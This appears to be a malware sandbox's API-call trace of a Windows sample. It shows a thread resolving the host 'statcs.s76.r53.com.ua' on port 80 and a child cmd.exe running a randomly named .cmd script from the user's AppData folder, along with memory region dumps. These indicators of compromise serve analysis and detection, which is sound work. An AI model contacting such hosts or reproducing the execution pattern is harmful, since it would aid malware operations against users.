wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.219] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.219] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.219] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.219] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.219] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) 
[0109.219] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.219] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.219] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.219] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x29e)) [0109.219] VirtualFree (lpAddress=0x12f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0109.220] FreeLibrary (hLibModule=0x76910000) returned 1 [0109.220] LocalFree (hMem=0x2f4478) returned 0x0 [0109.220] FreeLibrary (hLibModule=0x76910000) returned 1 [0109.220] LocalFree (hMem=0x2f4468) returned 0x0 [0109.220] ExitProcess (uExitCode=0x0) Thread: id = 56 os_tid = 0xcd4 [0108.890] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0108.890] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x13e8514, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="statcs.s76.r53.com.ua", lpUsedDefaultChar=0x0) returned 21 [0108.890] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x0, lpMultiByteStr=0x1421ffc, cbMultiByte=27, lpWideCharStr=0x152ed38, cchWideChar=2047 | out: lpWideCharStr="Host: statcs.s76.r53.com.ua") returned 27 [0108.890] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="80", 
cchWideChar=2, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2 [0108.890] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="80", cchWideChar=2, lpMultiByteStr=0x13da714, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="80", lpUsedDefaultChar=0x0) returned 2 [0108.891] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0108.891] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x13e867c, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="statcs.s76.r53.com.ua", lpUsedDefaultChar=0x0) returned 21 [0108.891] getaddrinfo (in: pNodeName="statcs.s76.r53.com.ua", pServiceName="80", pHints=0x152fb8c*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x152fbac | out: ppResult=0x152fbac*=0x0) returned 11001 [0108.992] getaddrinfo (in: pNodeName="statcs.s76.r53.com.ua", pServiceName="80", pHints=0x152fb8c*(ai_flags=0, ai_family=23, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x152fbac | out: ppResult=0x152fbac*=0x0) returned 11001 [0108.994] getnameinfo (in: pSockaddr=0x152fc14, SockaddrLength=0x0, pNodeBuffer=0x134494c, NodeBufferSize=0x401, pServiceBuffer=0x1405124, ServiceBufferSize=0x20, Flags=10 | out: pNodeBuffer="s", pServiceBuffer="") returned 10047 [0108.994] htons (hostshort=0x0) returned 0x0 [0108.994] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x0, cbMultiByte=0, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 0 [0108.994] MultiByteToWideChar (in: 
CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x0, cbMultiByte=0, lpWideCharStr=0x407d24, cchWideChar=0 | out: lpWideCharStr="") returned 0 [0108.994] GetCurrentThreadId () returned 0xcd4 [0108.994] GetCurrentThreadId () returned 0xcd4 [0108.994] GetCurrentThreadId () returned 0xcd4 [0108.994] GetCurrentThreadId () returned 0xcd4 [0108.994] GetCurrentThreadId () returned 0xcd4 [0108.994] GetCurrentThreadId () returned 0xcd4 [0108.994] GetCurrentThreadId () returned 0xcd4 [0108.994] GetCurrentThreadId () returned 0xcd4 [0108.994] GetCurrentThreadId () returned 0xcd4 [0108.994] GetCurrentThreadId () returned 0xcd4 [0108.994] GetCurrentThreadId () returned 0xcd4 [0108.994] GetCurrentThreadId () returned 0xcd4 [0108.994] SetEvent (hEvent=0x84) returned 1 [0108.994] GetCurrentThreadId () returned 0xcd4 [0108.994] GetCurrentThreadId () returned 0xcd4 [0108.994] GetCurrentThreadId () returned 0xcd4 [0108.994] CloseHandle (hObject=0xb8) returned 1 [0108.994] RtlExitUserThread (Status=0x0) Thread: id = 57 os_tid = 0xce4 Process: id = "35" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16760" os_pid = "0xccc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "33" os_parent_pid = "0xcb4" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\8Nkh0cv7.cmd\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5327 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" 
filename = "" Region: id = 5328 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 5329 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 5330 start_va = 0x130000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 5331 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 5332 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5333 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 5334 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 5335 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 5336 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 5487 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5488 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 5489 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 
region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5490 start_va = 0x410000 end_va = 0x50ffff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 5491 start_va = 0x700000 end_va = 0x70ffff entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 5492 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 5493 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 5494 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 5495 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5496 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5497 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 5498 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: 
"c:\\windows\\system32\\usp10.dll") Region: id = 5499 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 5500 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 5501 start_va = 0x230000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 5502 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 5503 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 5504 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 5505 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 5506 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5507 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 5508 start_va = 0x300000 end_va = 0x400fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 5509 start_va = 0x510000 end_va = 0x672fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 5510 start_va = 0x710000 end_va = 0x130ffff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x0000000000710000" filename = "" Region: id = 5552 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 5553 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5554 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5555 start_va = 0x100000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 5556 start_va = 0x1310000 end_va = 0x15defff entry_point = 0x1310000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 55 os_tid = 0xcd0 [0109.109] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22fc5c | out: lpSystemTimeAsFileTime=0x22fc5c*(dwLowDateTime=0x7f0a2140, dwHighDateTime=0x1d440a9)) [0109.109] GetCurrentProcessId () returned 0xccc [0109.109] GetCurrentThreadId () returned 0xcd0 [0109.109] GetTickCount () returned 0x261ce [0109.109] QueryPerformanceCounter (in: lpPerformanceCount=0x22fc54 | out: lpPerformanceCount=0x22fc54*=16589967147) returned 1 [0109.113] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0109.113] __set_app_type (_Type=0x1) [0109.113] __p__fmode () returned 0x76b331f4 [0109.113] __p__commode () returned 0x76b331fc [0109.113] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0109.113] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, 
_Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0109.114] GetCurrentThreadId () returned 0xcd0 [0109.114] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xcd0) returned 0x38 [0109.114] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0109.114] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0109.114] SetThreadUILanguage (LangId=0x0) returned 0x409 [0109.114] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0109.114] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22fbec | out: phkResult=0x22fbec*=0x0) returned 0x2 [0109.114] VirtualQuery (in: lpAddress=0x22fc23, lpBuffer=0x22fbbc, dwLength=0x1c | out: lpBuffer=0x22fbbc*(BaseAddress=0x22f000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0109.114] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x22fbbc, dwLength=0x1c | out: lpBuffer=0x22fbbc*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0109.114] VirtualQuery (in: lpAddress=0x131000, lpBuffer=0x22fbbc, dwLength=0x1c | out: lpBuffer=0x22fbbc*(BaseAddress=0x131000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0109.114] VirtualQuery (in: lpAddress=0x133000, lpBuffer=0x22fbbc, dwLength=0x1c | out: lpBuffer=0x22fbbc*(BaseAddress=0x133000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0109.114] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x22fbbc, dwLength=0x1c | out: lpBuffer=0x22fbbc*(BaseAddress=0x230000, 
AllocationBase=0x230000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0109.114] GetConsoleOutputCP () returned 0x1b5 [0109.114] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0109.115] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0109.115] _get_osfhandle (_FileHandle=1) returned 0x7 [0109.115] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0109.115] _get_osfhandle (_FileHandle=1) returned 0x7 [0109.115] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0109.115] _get_osfhandle (_FileHandle=1) returned 0x7 [0109.115] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0109.115] _get_osfhandle (_FileHandle=0) returned 0x3 [0109.115] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0109.116] _get_osfhandle (_FileHandle=0) returned 0x3 [0109.116] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0109.116] GetEnvironmentStringsW () returned 0x420150* [0109.116] FreeEnvironmentStringsW (penv=0x420150) returned 1 [0109.116] GetEnvironmentStringsW () returned 0x420150* [0109.116] FreeEnvironmentStringsW (penv=0x420150) returned 1 [0109.116] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22eb5c | out: phkResult=0x22eb5c*=0x40) returned 0x0 [0109.116] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22eb64, lpData=0x22eb68, lpcbData=0x22eb60*=0x1000 | out: lpType=0x22eb64*=0x0, lpData=0x22eb68*=0x0, lpcbData=0x22eb60*=0x1000) returned 0x2 [0109.116] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22eb64, lpData=0x22eb68, lpcbData=0x22eb60*=0x1000 | out: lpType=0x22eb64*=0x4, lpData=0x22eb68*=0x1, lpcbData=0x22eb60*=0x4) returned 0x0 [0109.116] RegQueryValueExW 
(in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22eb64, lpData=0x22eb68, lpcbData=0x22eb60*=0x1000 | out: lpType=0x22eb64*=0x0, lpData=0x22eb68*=0x1, lpcbData=0x22eb60*=0x1000) returned 0x2 [0109.117] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22eb64, lpData=0x22eb68, lpcbData=0x22eb60*=0x1000 | out: lpType=0x22eb64*=0x4, lpData=0x22eb68*=0x0, lpcbData=0x22eb60*=0x4) returned 0x0 [0109.117] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22eb64, lpData=0x22eb68, lpcbData=0x22eb60*=0x1000 | out: lpType=0x22eb64*=0x4, lpData=0x22eb68*=0x40, lpcbData=0x22eb60*=0x4) returned 0x0 [0109.117] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22eb64, lpData=0x22eb68, lpcbData=0x22eb60*=0x1000 | out: lpType=0x22eb64*=0x4, lpData=0x22eb68*=0x40, lpcbData=0x22eb60*=0x4) returned 0x0 [0109.117] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22eb64, lpData=0x22eb68, lpcbData=0x22eb60*=0x1000 | out: lpType=0x22eb64*=0x0, lpData=0x22eb68*=0x40, lpcbData=0x22eb60*=0x1000) returned 0x2 [0109.117] RegCloseKey (hKey=0x40) returned 0x0 [0109.117] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22eb5c | out: phkResult=0x22eb5c*=0x40) returned 0x0 [0109.117] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22eb64, lpData=0x22eb68, lpcbData=0x22eb60*=0x1000 | out: lpType=0x22eb64*=0x0, lpData=0x22eb68*=0x40, lpcbData=0x22eb60*=0x1000) returned 0x2 [0109.117] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22eb64, lpData=0x22eb68, lpcbData=0x22eb60*=0x1000 | out: lpType=0x22eb64*=0x4, lpData=0x22eb68*=0x1, lpcbData=0x22eb60*=0x4) returned 0x0 [0109.117] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, 
lpType=0x22eb64, lpData=0x22eb68, lpcbData=0x22eb60*=0x1000 | out: lpType=0x22eb64*=0x0, lpData=0x22eb68*=0x1, lpcbData=0x22eb60*=0x1000) returned 0x2 [0109.117] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22eb64, lpData=0x22eb68, lpcbData=0x22eb60*=0x1000 | out: lpType=0x22eb64*=0x4, lpData=0x22eb68*=0x0, lpcbData=0x22eb60*=0x4) returned 0x0 [0109.117] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22eb64, lpData=0x22eb68, lpcbData=0x22eb60*=0x1000 | out: lpType=0x22eb64*=0x4, lpData=0x22eb68*=0x9, lpcbData=0x22eb60*=0x4) returned 0x0 [0109.117] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22eb64, lpData=0x22eb68, lpcbData=0x22eb60*=0x1000 | out: lpType=0x22eb64*=0x4, lpData=0x22eb68*=0x9, lpcbData=0x22eb60*=0x4) returned 0x0 [0109.117] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22eb64, lpData=0x22eb68, lpcbData=0x22eb60*=0x1000 | out: lpType=0x22eb64*=0x0, lpData=0x22eb68*=0x9, lpcbData=0x22eb60*=0x1000) returned 0x2 [0109.117] RegCloseKey (hKey=0x40) returned 0x0 [0109.117] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886356 [0109.117] srand (_Seed=0x5b886356) [0109.117] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\8Nkh0cv7.cmd\"" [0109.117] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\8Nkh0cv7.cmd\"" [0109.117] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0109.118] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4219b8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0109.118] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: 
lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0109.118] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0109.118] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0109.118] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0109.118] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0109.118] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0109.118] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0109.118] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0109.118] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0109.118] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0109.118] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0109.118] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0109.118] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0109.118] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x22f928 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0109.118] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x22f928, lpFilePart=0x22f924 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x22f924*="Desktop") returned 0x18 [0109.118] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0109.119] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x22f6a4 | out: lpFindFileData=0x22f6a4) returned 0x41ffe0 [0109.119] FindClose (in: hFindFile=0x41ffe0 | out: hFindFile=0x41ffe0) returned 1 
[0109.119] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x22f6a4 | out: lpFindFileData=0x22f6a4) returned 0x41ffe0 [0109.119] FindClose (in: hFindFile=0x41ffe0 | out: hFindFile=0x41ffe0) returned 1 [0109.119] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x22f6a4 | out: lpFindFileData=0x22f6a4) returned 0x41ffe0 [0109.119] FindClose (in: hFindFile=0x41ffe0 | out: hFindFile=0x41ffe0) returned 1 [0109.119] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0109.119] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0109.119] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0109.119] GetEnvironmentStringsW () returned 0x420150* [0109.120] FreeEnvironmentStringsW (penv=0x420150) returned 1 [0109.120] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0109.122] 